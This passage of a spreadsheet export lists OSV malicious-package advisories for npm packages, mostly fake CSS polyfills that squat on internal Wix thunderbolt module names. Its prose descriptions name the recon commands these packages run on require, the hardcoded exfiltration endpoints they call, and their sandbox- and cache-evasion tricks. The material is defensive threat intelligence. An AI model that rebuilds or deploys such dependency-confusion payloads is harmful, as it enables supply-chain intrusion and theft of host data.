      <c r="B204" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C204" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17547</t>
        </is>
      </c>
      <c r="D204" s="5" t="inlineStr"/>
      <c r="E204" s="5" t="inlineStr"/>
      <c r="F204" s="5" t="inlineStr"/>
      <c r="G204" s="5" t="inlineStr"/>
      <c r="H204" s="5" t="inlineStr"/>
      <c r="I204" s="5" t="inlineStr"/>
      <c r="J204" s="5" t="inlineStr"/>
      <c r="K204" s="5" t="inlineStr"/>
      <c r="L204" s="5" t="inlineStr">
        <is>
          <t>npm:css-at-scope-polyfill</t>
        </is>
      </c>
      <c r="M204" s="5" t="inlineStr"/>
      <c r="N204" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O204" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P204" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q204" s="5" t="inlineStr"/>
      <c r="R204" s="5" t="inlineStr"/>
      <c r="S204" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (c4d8d974b7fabf04fa662971cd8041fb76775bf5ed2902cbbffed0f881e2036d)
Package is published under a CSS-polyfill name but ships thunderboltRegistry.js, which exports Wix internal registry module names (thunderboltRegistry, siteAssetsRegistry, editorRegistry, corvidRegistry, etc.) so that a build resolving any of those names will load this file. On require(), an IIFE runs child_process.execSync to collect `id`, `whoami`, `uname`, `ifconfig`/`ip addr`, and the contents of /etc/hosts, plus a beacon containing node version, platform, pid, and hostname, and POSTs the output via fetch to the hardcoded HTTP endpoint http://dxpoc.gt.tc/callback.php/bb8968d0f67000433bf7005dd5ad2d1f. The payload clears any require.cache entries referencing 'thunderboltRegistry' and acquires child_process through three fallbacks, including instantiating a new Module via module.constructor to bypass mocks or sandboxes. The declared CSS-polyfill purpose has no relation to this behavior; the shape is a dependency-confusion squat against internal Wix modules.
</t>
        </is>
      </c>
      <c r="T204" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17547</t>
        </is>
      </c>
    </row>
    <row r="205">
      <c r="A205" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B205" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C205" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17548</t>
        </is>
      </c>
      <c r="D205" s="5" t="inlineStr"/>
      <c r="E205" s="5" t="inlineStr"/>
      <c r="F205" s="5" t="inlineStr"/>
      <c r="G205" s="5" t="inlineStr"/>
      <c r="H205" s="5" t="inlineStr"/>
      <c r="I205" s="5" t="inlineStr"/>
      <c r="J205" s="5" t="inlineStr"/>
      <c r="K205" s="5" t="inlineStr"/>
      <c r="L205" s="5" t="inlineStr">
        <is>
          <t>npm:css-ayucyz-polyfill</t>
        </is>
      </c>
      <c r="M205" s="5" t="inlineStr"/>
      <c r="N205" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O205" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P205" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q205" s="5" t="inlineStr"/>
      <c r="R205" s="5" t="inlineStr"/>
      <c r="S205" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (d8c7540d3981f510255434529f76a2ed9a24b0783e7e8e3369b41f71b93ebd1a)
On require, thunderboltRegistry.js runs an IIFE that acquires child_process via multiple fallbacks and executes shell commands (id, whoami, uname -a, ifconfig/ip addr, cat /etc/hosts), then GETs the collected output along with the hostname, platform and Node version to the hardcoded plain-HTTP endpoint http://dxpoc.gt.tc/callback.php/bb8968d0f67000433bf7005dd5ad2d1f. One of the beacons is self-labeled beacon=rce-poc. The package presents itself as a CSS polyfill and exposes modules named thunderboltRegistry, siteAssetsRegistry, editorRegistry and corvidRegistry — internal Wix Thunderbolt names — behind a Proxy returning no-op functions, with registry-manifest.min.json pointing fake entries at a static.parastorage.com URL, so a consumer that resolves this package in place of the real Wix internals loads the exfiltration IIFE while the facade silently returns no-ops.
</t>
        </is>
      </c>
      <c r="T205" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17548</t>
        </is>
      </c>
    </row>
    <row r="206">
      <c r="A206" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B206" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C206" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17549</t>
        </is>
      </c>
      <c r="D206" s="5" t="inlineStr"/>
      <c r="E206" s="5" t="inlineStr"/>
      <c r="F206" s="5" t="inlineStr"/>
      <c r="G206" s="5" t="inlineStr"/>
      <c r="H206" s="5" t="inlineStr"/>
      <c r="I206" s="5" t="inlineStr"/>
      <c r="J206" s="5" t="inlineStr"/>
      <c r="K206" s="5" t="inlineStr"/>
      <c r="L206" s="5" t="inlineStr">
        <is>
          <t>npm:css-display-reading-polyfill</t>
        </is>
      </c>
      <c r="M206" s="5" t="inlineStr"/>
      <c r="N206" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O206" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P206" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q206" s="5" t="inlineStr"/>
      <c r="R206" s="5" t="inlineStr"/>
      <c r="S206" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (b397798b7209f1094c33dc3ed721d4a3ef0536065317bd06bae76e33dd505334)
The package ships payload.bundle.min.js, which on load runs an IIFE that invokes child_process.execSync to run id, whoami, and uname, collects os.hostname(), node version, process.platform, and pid, and transmits the results to the hardcoded collector https://webhook.site/5e52603d-f802-4a6f-b91b-43c3a5b45b6b via fetch and https.get. The published name impersonates an internal Wix thunderbolt module: shipped thunderbolt manifest JSON files declare this package as the loader entry for dozens of Wix component registry names (Container, StylableButton, MasterPage,...) and nine host registries (thunderboltRegistry, editorRegistry, corvidRegistry,...), with "shared":["payload.bundle.min.js"] and components mapped to that bundle. index.js is a benign stub; the exfil code lives entirely in the bundle, so any Wix runtime that resolves these internal registry names from this public package executes the host-reconnaissance payload. This is a dependency-confusion active attack: installer-side shell command output and host identifiers are sent to an attacker-controlled, non-first-party endpoint.
</t>
        </is>
      </c>
      <c r="T206" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17549</t>
        </is>
      </c>
    </row>
    <row r="207">
      <c r="A207" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B207" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C207" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17550</t>
        </is>
      </c>
      <c r="D207" s="5" t="inlineStr"/>
      <c r="E207" s="5" t="inlineStr"/>
      <c r="F207" s="5" t="inlineStr"/>
      <c r="G207" s="5" t="inlineStr"/>
      <c r="H207" s="5" t="inlineStr"/>
      <c r="I207" s="5" t="inlineStr"/>
      <c r="J207" s="5" t="inlineStr"/>
      <c r="K207" s="5" t="inlineStr"/>
      <c r="L207" s="5" t="inlineStr">
        <is>
          <t>npm:css-dwsawd-polyfill</t>
        </is>
      </c>
      <c r="M207" s="5" t="inlineStr"/>
      <c r="N207" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O207" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P207" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q207" s="5" t="inlineStr"/>
      <c r="R207" s="5" t="inlineStr"/>
      <c r="S207" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (1c370cda09695e44d06a44bc14d14817edadc047e4dad0314edcfc752be796e9)
The package name mimics a Wix thunderbolt polyfill and ships a registry-manifest.min.json that aliases legitimate @wix thunderbolt registry module names to thunderboltRegistry.js. On require, thunderboltRegistry.js runs an IIFE that uses child_process.execSync to execute shell reconnaissance (id, whoami, uname -a, ifconfig/ip addr, /etc/hosts) and fetches http://dxpoc.gt.tc/callback.php/bb8968d0f67000433bf7005dd5ad2d1f with the command outputs plus hostname, pid, platform, node version, and a site identifier as query parameters, tagged 'rce-poc'. A fallback path constructs a fresh Module instance to re-resolve child_process if the require cache is stubbed, ensuring execution. The destination is plain HTTP to an unrelated external host and is not caller-configurable.
</t>
        </is>
      </c>
      <c r="T207" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17550</t>
        </is>
      </c>
    </row>
    <row r="208">
      <c r="A208" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B208" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C208" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17551</t>
        </is>
      </c>
      <c r="D208" s="5" t="inlineStr"/>
      <c r="E208" s="5" t="inlineStr"/>
      <c r="F208" s="5" t="inlineStr"/>
      <c r="G208" s="5" t="inlineStr"/>
      <c r="H208" s="5" t="inlineStr"/>
      <c r="I208" s="5" t="inlineStr"/>
      <c r="J208" s="5" t="inlineStr"/>
      <c r="K208" s="5" t="inlineStr"/>
      <c r="L208" s="5" t="inlineStr">
        <is>
          <t>npm:css-gvqmfn-polyfill</t>
        </is>
      </c>
      <c r="M208" s="5" t="inlineStr"/>
      <c r="N208" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O208" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P208" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q208" s="5" t="inlineStr"/>
      <c r="R208" s="5" t="inlineStr"/>
      <c r="S208" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (ffb3f332a818748252e49dcf21ffb6949c531afd401ee697cc08ba00a067ae30)
css-gvqmfn-polyfill mimics Wix internal @wix/thunderbolt-* CSS polyfill naming and ships a Proxy-based cover stub that re-exports registry names (thunderboltRegistry, siteAssetsRegistry, editorRegistry, corvidRegistry, etc.) as no-op functions to appear functional. On require of thunderboltRegistry.js, an IIFE unconditionally executes `id`, `whoami`, `uname -a`, `ifconfig`/`ip addr`, and `cat /etc/hosts` via child_process, collects os.hostname, Node version, platform, and pid, and sends the output together with an `rce-poc` beacon to the hardcoded attacker endpoint http://dxpoc.gt.tc/callback.php/bb8968d0f67000433bf7005dd5ad2d1f over plain HTTP. The accompanying registry-manifest.min.json points sibling registries to parastorage.com URLs that do not host this file, consistent with a dependency-confusion lure targeting Wix build environments.
</t>
        </is>
      </c>
      <c r="T208" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17551</t>
        </is>
      </c>
    </row>
    <row r="209">
      <c r="A209" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B209" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C209" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17552</t>
        </is>
      </c>
      <c r="D209" s="5" t="inlineStr"/>
      <c r="E209" s="5" t="inlineStr"/>
      <c r="F209" s="5" t="inlineStr"/>
      <c r="G209" s="5" t="inlineStr"/>
      <c r="H209" s="5" t="inlineStr"/>
      <c r="I209" s="5" t="inlineStr"/>
      <c r="J209" s="5" t="inlineStr"/>
      <c r="K209" s="5" t="inlineStr"/>
      <c r="L209" s="5" t="inlineStr">
        <is>
          <t>npm:css-hgwctv-polyfill</t>
        </is>
      </c>
      <c r="M209" s="5" t="inlineStr"/>
      <c r="N209" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O209" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P209" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q209" s="5" t="inlineStr"/>
      <c r="R209" s="5" t="inlineStr"/>
      <c r="S209" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (ee1103a16c6f933686f07e8ce94068057f49e5cf2f0a6a9ccf01f2baeb7cfe95)
On require, thunderboltRegistry.js runs an immediately-invoked function that uses child_process.execSync to collect host identity and network reconnaissance from the installer's machine (`id`, `whoami`, `uname -a`, `ifconfig`/`ip addr`, and `/etc/hosts`), plus hostname, Node.js version, platform and pid, and transmits each result via fetch to the hardcoded plain-HTTP endpoint http://dxpoc.gt.tc/callback.php/bb8968d0f67000433bf7005dd5ad2d1f. The package also exports Proxy stubs named thunderboltRegistry, siteAssetsRegistry, editorRegistry, corvidRegistry and ships a registry-manifest.min.json referencing parastorage.com, mimicking internal Wix thunderbolt build modules so the module auto-loads inside a Wix build and executes the reconnaissance payload. A CSS polyfill has no functional reason to execute shell commands, read /etc/hosts, or contact an external host.
</t>
        </is>
      </c>
      <c r="T209" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17552</t>
        </is>
      </c>
    </row>
    <row r="210">
      <c r="A210" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B210" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C210" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17553</t>
        </is>
      </c>
      <c r="D210" s="5" t="inlineStr"/>
      <c r="E210" s="5" t="inlineStr"/>
      <c r="F210" s="5" t="inlineStr"/>
      <c r="G210" s="5" t="inlineStr"/>
      <c r="H210" s="5" t="inlineStr"/>
      <c r="I210" s="5" t="inlineStr"/>
      <c r="J210" s="5" t="inlineStr"/>
      <c r="K210" s="5" t="inlineStr"/>
      <c r="L210" s="5" t="inlineStr">
        <is>
          <t>npm:css-ikomdq-polyfill</t>
        </is>
      </c>
      <c r="M210" s="5" t="inlineStr"/>
      <c r="N210" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O210" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P210" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q210" s="5" t="inlineStr"/>
      <c r="R210" s="5" t="inlineStr"/>
      <c r="S210" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (255cceca3ca8631c9b225745c5b64a71fd6c09b60fa3ad95b419fccb66f035f2)
The package presents itself as a CSS polyfill but ships thunderboltRegistry.js, which on require() executes a top-level IIFE that runs id, whoami, uname -a, ifconfig/ip addr, and reads /etc/hosts via child_process.execSync, then posts the command outputs together with hostname, node version, platform, and pid to the hardcoded plain-HTTP endpoint http://dxpoc.gt.tc/callback.php/ using fetch. The module also deletes its own entries from require.cache so the payload re-runs on each require() rather than being memoized. The package name and the thunderbolt/editor/corvid Proxy facade impersonate Wix parastorage registry modules to encourage accidental installation.
</t>
        </is>
      </c>
      <c r="T210" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17553</t>
        </is>
      </c>
    </row>
    <row r="211">
      <c r="A211" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B211" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C211" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17554</t>
        </is>
      </c>
      <c r="D211" s="5" t="inlineStr"/>
      <c r="E211" s="5" t="inlineStr"/>
      <c r="F211" s="5" t="inlineStr"/>
      <c r="G211" s="5" t="inlineStr"/>
      <c r="H211" s="5" t="inlineStr"/>
      <c r="I211" s="5" t="inlineStr"/>
      <c r="J211" s="5" t="inlineStr"/>
      <c r="K211" s="5" t="inlineStr"/>
      <c r="L211" s="5" t="inlineStr">
        <is>
          <t>npm:css-mpmdds-polyfill</t>
        </is>
      </c>
      <c r="M211" s="5" t="inlineStr"/>
      <c r="N211" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O211" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P211" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q211" s="5" t="inlineStr"/>
      <c r="R211" s="5" t="inlineStr"/>
      <c r="S211" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (4bac0cb0a2c693985668a890ff2ace72ff2d00dac60bc5470a77160c4d765106)
The package presents itself as a CSS polyfill but ships thunderboltRegistry.js which runs an IIFE at module load. The IIFE acquires child_process via multiple fallbacks (require('child_process'), require('node:child_process'), and a synthesized Module constructor), executes shell commands to collect host identity (id, whoami, uname -a, ifconfig/ip addr, /etc/hosts) along with os.hostname, Node version, platform and pid, and transmits each result via fetch() as query parameters to the hardcoded endpoint http://dxpoc.gt.tc/callback.php/bb8968d0f67000433bf7005dd5ad2d1f over plaintext HTTP to a free-DNS (gt.tc) host unrelated to any CSS polyfill functionality. The IIFE also enumerates require.cache and deletes entries containing 'thunderboltRegistry' so the payload re-executes on every require rather than being memoized. registry-manifest.min.json maps multiple Wix/thunderbolt internal registry module names (siteAssetsRegistry.js, editorRegistry.js, and others) all to the same thunderboltRegistry.js payload mirrored on static.parastorage.com's unpkg mirror, consistent with a dependency-confusion / typosquat targeting the Wix thunderbolt ecosystem. The package stubs a Wix-ecosystem API surface via Proxy to appear functional while the exfil IIFE runs. The package name resembles a CSS polyfill but the shipped behavior is host reconnaissance and exfiltration with cache-busting evasion.
</t>
        </is>
      </c>
      <c r="T211" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17554</t>
        </is>
      </c>
    </row>
    <row r="212">
      <c r="A212" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B212" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C212" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17555</t>
        </is>
      </c>
      <c r="D212" s="5" t="inlineStr"/>
      <c r="E212" s="5" t="inlineStr"/>
      <c r="F212" s="5" t="inlineStr"/>
      <c r="G212" s="5" t="inlineStr"/>
      <c r="H212" s="5" t="inlineStr"/>
      <c r="I212" s="5" t="inlineStr"/>
      <c r="J212" s="5" t="inlineStr"/>
      <c r="K212" s="5" t="inlineStr"/>
      <c r="L212" s="5" t="inlineStr">
        <is>
          <t>npm:css-nbanqq-polyfill</t>
        </is>
      </c>
      <c r="M212" s="5" t="inlineStr"/>
      <c r="N212" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O212" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P212" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q212" s="5" t="inlineStr"/>
      <c r="R212" s="5" t="inlineStr"/>
      <c r="S212" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (7377a70c94f8fd1719147b2023860926935a70410f672e07411326284f11a69f)
The package impersonates Wix thunderbolt internal registry modules (exporting `thunderboltRegistry`, `siteAssetsRegistry`, `editorRegistry`, `corvidRegistry`, etc. and shipping a `registry-manifest.min.json` referencing static.parastorage.com) as a dependency-confusion lure. On require of thunderboltRegistry.js, a top-level IIFE uses child_process.execSync to run `id`, `whoami`, `uname -a`, `ifconfig`/`ip addr`, and `cat /etc/hosts`, URL-encodes the output together with hostname, Node version, platform, and pid, and sends it via fetch to the hardcoded attacker endpoint http://dxpoc.gt.tc/callback.php/bb8968d0f67000433bf7005dd5ad2d1f. Proxy-wrapped stubs make the require() call appear to resolve normally while the exfiltration runs. Any build or runtime that resolves this package name will execute the reconnaissance payload and leak host identity and network configuration to the attacker-controlled host.
</t>
        </is>
      </c>
      <c r="T212" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17555</t>
        </is>
      </c>
    </row>
    <row r="213">
      <c r="A213" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B213" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C213" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17556</t>
        </is>
      </c>
      <c r="D213" s="5" t="inlineStr"/>
      <c r="E213" s="5" t="inlineStr"/>
      <c r="F213" s="5" t="inlineStr"/>
      <c r="G213" s="5" t="inlineStr"/>
      <c r="H213" s="5" t="inlineStr"/>
      <c r="I213" s="5" t="inlineStr"/>
      <c r="J213" s="5" t="inlineStr"/>
      <c r="K213" s="5" t="inlineStr"/>
      <c r="L213" s="5" t="inlineStr">
        <is>
          <t>npm:css-ogojwh-polyfill</t>
        </is>
      </c>
      <c r="M213" s="5" t="inlineStr"/>
      <c r="N213" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O213" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P213" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q213" s="5" t="inlineStr"/>
      <c r="R213" s="5" t="inlineStr"/>
      <c r="S213" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (aff543635c832e0563229f42fcc7673c835f2ba5a9ae41d680aa572cfba49765)
css-ogojwh-polyfill@1.0.0 presents itself as a CSS polyfill but ships thunderboltRegistry.js which, on require, runs an IIFE that executes shell commands via child_process.execSync (id, whoami, uname -a, ifconfig/ip addr, cat /etc/hosts) and POSTs their output along with hostname, Node version, platform and pid to the hardcoded endpoint http://dxpoc.gt.tc/callback.php/bb8968d0f67000433bf7005dd5ad2d1f, with a beacon label of `rce-poc`. The module also exports no-op Proxy stubs under module names matching Wix thunderbolt registry modules (thunderboltRegistry, siteAssetsRegistry, editorRegistry), consistent with a dependency-confusion / typosquat shim whose only real behavior is the recon-and-exfil payload executed at import time.
</t>
        </is>
      </c>
      <c r="T213" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17556</t>
        </is>
      </c>
    </row>
    <row r="214">
      <c r="A214" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B214" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C214" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17557</t>
        </is>
      </c>
      <c r="D214" s="5" t="inlineStr"/>
      <c r="E214" s="5" t="inlineStr"/>
      <c r="F214" s="5" t="inlineStr"/>
      <c r="G214" s="5" t="inlineStr"/>
      <c r="H214" s="5" t="inlineStr"/>
      <c r="I214" s="5" t="inlineStr"/>
      <c r="J214" s="5" t="inlineStr"/>
      <c r="K214" s="5" t="inlineStr"/>
      <c r="L214" s="5" t="inlineStr">
        <is>
          <t>npm:css-svqggc-polyfill</t>
        </is>
      </c>
      <c r="M214" s="5" t="inlineStr"/>
      <c r="N214" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O214" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P214" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q214" s="5" t="inlineStr"/>
      <c r="R214" s="5" t="inlineStr"/>
      <c r="S214" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (6b23cf39720388bcf9f26621bd52e256e18a011bf3b6821b7d9f5f60115b9663)
Package masquerades as a CSS polyfill while impersonating internal Wix Thunderbolt registry modules (thunderboltRegistry, siteAssetsRegistry, editorRegistry, corvidRegistry, and other namespace stubs), with a shipped registry-manifest pointing those names at parastorage.com URLs under this package's own name — a dependency-confusion shape. thunderboltRegistry.js runs an IIFE on require that purges its own entries from require.cache so each require re-runs the payload, obtains child_process via multiple fallbacks (including constructing a fresh Module instance to bypass sandboxed require stubs), and executes reconnaissance commands (id, whoami, uname -a, ifconfig/ip addr, /etc/hosts) via execSync. The command output plus host beacon fields (node version, platform, pid, hostname, site) are sent over cleartext HTTP via fetch GET to the hardcoded endpoint http://dxpoc.gt.tc/callback.php/bb8968d0f67000433bf7005dd5ad2d1f. The Proxy-based stub exports ensure the import appears to succeed silently after exfiltration.
</t>
        </is>
      </c>
      <c r="T214" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17557</t>
        </is>
      </c>
    </row>
    <row r="215">
      <c r="A215" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B215" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C215" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17558</t>
        </is>
      </c>
      <c r="D215" s="5" t="inlineStr"/>
      <c r="E215" s="5" t="inlineStr"/>
      <c r="F215" s="5" t="inlineStr"/>
      <c r="G215" s="5" t="inlineStr"/>
      <c r="H215" s="5" t="inlineStr"/>
      <c r="I215" s="5" t="inlineStr"/>
      <c r="J215" s="5" t="inlineStr"/>
      <c r="K215" s="5" t="inlineStr"/>
      <c r="L215" s="5" t="inlineStr">
        <is>
          <t>npm:css-txedrf-polyfill</t>
        </is>
      </c>
      <c r="M215" s="5" t="inlineStr"/>
      <c r="N215" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O215" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P215" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q215" s="5" t="inlineStr"/>
      <c r="R215" s="5" t="inlineStr"/>
      <c r="S215" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (7d70c660ff3138360df0239fc6ef3db7beaca61ca069bc2d108ed893c68acb63)
thunderboltRegistry.js executes an IIFE at require time that runs OS reconnaissance commands (id, whoami, uname -a, ifconfig/ip addr, cat /etc/hosts) via child_process.execSync, URL-encodes the output together with hostname, node version, platform, and pid, and POSTs/GETs each result via fetch to the hardcoded endpoint http://dxpoc.gt.tc/callback.php/bb8968d0f67000433bf7005dd5ad2d1f over plain HTTP. The package's exported module names (thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry, editorRegistry, corvidRegistry) impersonate Wix thunderbolt internal registry modules and the manifest references static.parastorage.com URLs, consistent with a dependency-confusion lure aimed at a private Wix namespace. Any consumer that requires one of these modules triggers the reconnaissance and exfiltration to the attacker-controlled host.
</t>
        </is>
      </c>
      <c r="T215" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17558</t>
        </is>
      </c>
    </row>
    <row r="216">
      <c r="A216" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B216" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C216" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17559</t>
        </is>
      </c>
      <c r="D216" s="5" t="inlineStr"/>
      <c r="E216" s="5" t="inlineStr"/>
      <c r="F216" s="5" t="inlineStr"/>
      <c r="G216" s="5" t="inlineStr"/>
      <c r="H216" s="5" t="inlineStr"/>
      <c r="I216" s="5" t="inlineStr"/>
      <c r="J216" s="5" t="inlineStr"/>
      <c r="K216" s="5" t="inlineStr"/>
      <c r="L216" s="5" t="inlineStr">
        <is>
          <t>npm:hardhat-kex</t>
        </is>
      </c>
      <c r="M216" s="5" t="inlineStr"/>
      <c r="N216" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O216" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P216" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q216" s="5" t="inlineStr"/>
      <c r="R216" s="5" t="inlineStr"/>
      <c r="S216" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (b8fa212654344b734814cee2291c9b9b91ecbc353bde5e83740624ee5f263c69)
